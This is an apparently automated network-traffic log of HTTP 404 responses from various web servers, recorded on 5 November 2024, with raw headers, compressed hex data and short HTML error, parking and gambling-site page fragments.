            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:34:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 14:34:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 14:34:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:34:50 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:34:53 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:34:56 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:34:59 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:13 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:16 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:19 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:21 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:27 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 690 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:30 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 690 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:32 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 690 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 14:35:35 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 690 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></htm
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Tue, 05 Nov 2024 14:35:41 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 05 Nov 2024 14:35:43 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f 82 28 08 eb 07 08 fb 4e e2 34 35 c6 48 9c 79 3f 6a ef b8 71 50 0e 3a dc bb 79 92 97 0f d0 df fb 97 f6 7e d8 2b 0d 9f 12 38 81 be a7 15 8e e7 45 59 f0 00 dd f4 a7 4e 19 44 d9 bb ee ff f8 29 7e 05 dc 3a ca b3 6f 90 9f e7 35 28 6f ec e1 45 55 91 38 a7 07 68 9f e4 6e fc 7f c0 ee fb 10 7f 4e 94 7d e0 f4 2c e4 7d 02 fc fa 01 72 9a 3a 7f cf ec 85 5c 3e 5b f1 23 fd 4d 77 08 43 af 3d f0 a6 e9 f7 12 54 45 9e 55 e0 3e ca fc fc 46 d1 57 bb f2 97 f6 c6 fb 6a 7a 55 3b 75 53 dd bb b9 07 6e 26 5f a2 e6 d9 fd 14 8a fe c3 1f cd 2e 81 53 e5 d9 d7 f3 71 ea 7a fe 10 92 5f b9 e0 4a b2 8b 4d dd fa a2 d7 b7 9f 9e fd fe cc eb 7e 28 14 37 0c 5f b5 45 2f ed 53 79 87 58 1a 02 c3 49 3e 33 d7 55 
b4 96 a0 00 4e fd 00 65 f9 fd f3 cf 37 b8 41 fc ab 91 af 5c 71 86 60 49 f6 fd b0 57 da f4 d2 de 68 57 5a de 4a e4 7c a1 d4 9f 87 b8 8f 6a 90 56 37 30 3f 23 09 47 8b fe 43 2a 45 d9 5b 2a 33 c4 17 81 76 ed 8f 1b f4 97 38 de e7 75 9d a7 0f d0 c0 e3 4d d9 9f 15 e8 a5 94 8c ae 89 57 96 78 87 7f 6b 86 c1 dd f7 1e 70 f3 d2 19 fc f7 00 35 99 07 ca a1 08 bd 67 f4 6a 71 12 a7 39 fe ca 1b 5f f2 79 08 f3 16 94 57 f1 f5 5e 8c 07 3f 77 9b ea 6b b2 e3 d6 51 7b 9b 39 af 42 e0 ec 88 64 46 6f 02 5e 09 f1 75 14 bf d6 b5 cf 1c 75 95 92 d8 17 66 6c 92 1b df fc cc b4 28 bb d4 ec 4f 6a 5e 12 55 f5 fd 65 59 19 02 3e 03 50 de d4 55 e4 81 cb cb 9b f8 83 23 5f a5 bb 29 c6 3f c3 eb aa ff 4d db 26 81 92 e8 46 2c 3f c9 87 fc 1a 2a e3 7b 0e 17 4f 3b 49 14 64 0f 90 0b b2 1a 94 6f f4 37 c8 ef 37 79 f3 12 f4 9f 71 ba 2c b8 0f 10 f6 55 0d 1b ea e6 7d 94 3a c1 ad 1b 7f 2a f5 65 ed bd 4c 1d 76 39 51 16 dc ea 37 ac b9 dd cb fa b8 cf 13 ef 4d 8b c1 8e d7 5a 7e b4 41 97 97 de fd be 04 4e fc 00 5d 1e f7 4e 92 bc 07 f8 53 5a 55 a0 6c 41 09 39 9e 57 82 ea b6 24 7c 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 05 Nov 2024 14:35:46 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f 82 28 08 eb 07 08 fb 4e e2 34 35 c6 48 9c 79 3f 6a ef b8 71 50 0e 3a dc bb 79 92 97 0f d0 df fb 97 f6 7e d8 2b 0d 9f 12 38 81 be a7 15 8e e7 45 59 f0 00 dd f4 a7 4e 19 44 d9 bb ee ff f8 29 7e 05 dc 3a ca b3 6f 90 9f e7 35 28 6f ec e1 45 55 91 38 a7 07 68 9f e4 6e fc 7f c0 ee fb 10 7f 4e 94 7d e0 f4 2c e4 7d 02 fc fa 01 72 9a 3a 7f cf ec 85 5c 3e 5b f1 23 fd 4d 77 08 43 af 3d f0 a6 e9 f7 12 54 45 9e 55 e0 3e ca fc fc 46 d1 57 bb f2 97 f6 c6 fb 6a 7a 55 3b 75 53 dd bb b9 07 6e 26 5f a2 e6 d9 fd 14 8a fe c3 1f cd 2e 81 53 e5 d9 d7 f3 71 ea 7a fe 10 92 5f b9 e0 4a b2 8b 4d dd fa a2 d7 b7 9f 9e fd fe cc eb 7e 28 14 37 0c 5f b5 45 2f ed 53 79 87 58 1a 02 c3 49 3e 33 d7 55 
b4 96 a0 00 4e fd 00 65 f9 fd f3 cf 37 b8 41 fc ab 91 af 5c 71 86 60 49 f6 fd b0 57 da f4 d2 de 68 57 5a de 4a e4 7c a1 d4 9f 87 b8 8f 6a 90 56 37 30 3f 23 09 47 8b fe 43 2a 45 d9 5b 2a 33 c4 17 81 76 ed 8f 1b f4 97 38 de e7 75 9d a7 0f d0 c0 e3 4d d9 9f 15 e8 a5 94 8c ae 89 57 96 78 87 7f 6b 86 c1 dd f7 1e 70 f3 d2 19 fc f7 00 35 99 07 ca a1 08 bd 67 f4 6a 71 12 a7 39 fe ca 1b 5f f2 79 08 f3 16 94 57 f1 f5 5e 8c 07 3f 77 9b ea 6b b2 e3 d6 51 7b 9b 39 af 42 e0 ec 88 64 46 6f 02 5e 09 f1 75 14 bf d6 b5 cf 1c 75 95 92 d8 17 66 6c 92 1b df fc cc b4 28 bb d4 ec 4f 6a 5e 12 55 f5 fd 65 59 19 02 3e 03 50 de d4 55 e4 81 cb cb 9b f8 83 23 5f a5 bb 29 c6 3f c3 eb aa ff 4d db 26 81 92 e8 46 2c 3f c9 87 fc 1a 2a e3 7b 0e 17 4f 3b 49 14 64 0f 90 0b b2 1a 94 6f f4 37 c8 ef 37 79 f3 12 f4 9f 71 ba 2c b8 0f 10 f6 55 0d 1b ea e6 7d 94 3a c1 ad 1b 7f 2a f5 65 ed bd 4c 1d 76 39 51 16 dc ea 37 ac b9 dd cb fa b8 cf 13 ef 4d 8b c1 8e d7 5a 7e b4 41 97 97 de fd be 04 4e fc 00 5d 1e f7 4e 92 bc 07 f8 53 5a 55 a0 6c 41 09 39 9e 57 82 ea b6 24 7c 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Tue, 05 Nov 2024 14:35:49 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 36 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 
20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:35:55 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:35:58 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:36:01 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:36:04 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html
            Date: Tue, 05 Nov 2024 14:36:09 GMT
            Server: Netlify
            X-Nf-Request-Id: 01JBYC29JXT9Z7D0083Z51WAZ4
            Connection: close
            Transfer-Encoding: chunked
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html
            Date: Tue, 05 Nov 2024 14:36:12 GMT
            Server: Netlify
            X-Nf-Request-Id: 01JBYC2C5EK6FZCGARX881VH00
            Connection: close
            Transfer-Encoding: chunked
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html
            Date: Tue, 05 Nov 2024 14:36:15 GMT
            Server: Netlify
            X-Nf-Request-Id: 01JBYC2ER0S7X9JQPQV0N533C2
            Connection: close
            Transfer-Encoding: chunked
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html
            Date: Tue, 05 Nov 2024 14:36:17 GMT
            Server: Netlify
            X-Nf-Request-Id: 01JBYC2HAE3FKS9CP1QGCY05CR
            Connection: close
            Transfer-Encoding: chunked
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:37:23 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            vary: Accept-Encoding
            cf-cache-status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW7nlen7HPIvQqGTE2%2FHmR2ObGDhzVOqzSU6bAtsN1OvXDoX03OtbTVuNnZ2NnUICTJZGUje1ZZujj2d%2FARVz4jN5TFWiS2dTcuIgCGnBPhy7jOvksIGGVpcc3sIzj%2BCP4e%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8ddd94db683442e2-EWR
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=103319&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Data Ascii: 2099<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby/sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO89 F
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:37:28 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 7f 87 29 41 29 96 d8 89 fc c5 92 5b 5e 2f 00 8f bd 58 04 be 63 2f fd 70 3e 0e dc f7 9e c6 e1 1c 30 06 76 1c c3 37 22 1f 58 3e f7 66 f6 00 f3 be 71 33 f8 2e 15 77 b5 1c 1c 0e 98 f4 9f 8c 9f 8c 19 88 10 46 67 83 d1 e0 bb 67 91 bd 38 1f 1c fe 1c 80 b1 10 80 fc 20 82 2a 71 a2 d5 6c f2 c8 8f 97 08 e3 bb 25 04 f6 64 65 07 3e 8f b8 23 db 59 fa f3 33 c1 8e 96 4f c6 d7 cb f9 b3 27 e3 b7 26 59 fe 80 e5 f7 97 de 0c 51 7d 14 78 33 
e0 bd 54 18 a6 7f 02 df 37 28 e6 ad 20 cf b3 08 63 1f c5 31 38 94 46 03 14 36 60 78 b2 12 75 d9 c0 df aa 8a bf 15 89 52 74 4a b1 29 45 c9 9f 65 2b a1 b0 57 d9 00 3b 07 79 7e d2 17 3e 11 49 46 f1 ed 68 27 d6 ab e8 8a 02 90 4b 02 50 ec 02 bb 12 47 2f 1a fd 36 89 6b a7 f0 3c 45 3c 11 b4 a0 70 15 f7 e6 ac c0 d3 17 45 ae 3e 8b ce ec b9 ff 25 29 e9 26 95 1a 96 f3 15 eb 92 6a 4b 36 19 c5 c4 8a 62 e5 d5 ab da 5c e1 45 2d 70 2a 17 34 c1 cc bf b2 14 d9 86 52 5c 8f b5 2f 12 20 15 a6 ea 79 d6 24 93 c6 e5 e5 cb 76 ae 51 6a 51 8b 18 5d 45 b5 93 a7 f9 e7 04 d4 2c a8 a3 91 a3 13 9d b6 cc 46 21 5d ef 93 ad c6 a6 62 b4 80 16 db 40 91 a4 44 76 05 b2 9b ca 51 0a 28 b4 02 79 ad 84 39 39 79 8a 52 10 68 49 26 d3 62 6e b3 26 44 b5 8e d6 a3 dc 05 de 37 c9 9d 94 ea 55 99 4f 70 30 25 53 e4 b6 b2 0b 32 60 52 96 dd 42 6e b5 ae 2f 45 c9 6a 35 7c ec 73 42 78 a1 ca Data Ascii: i 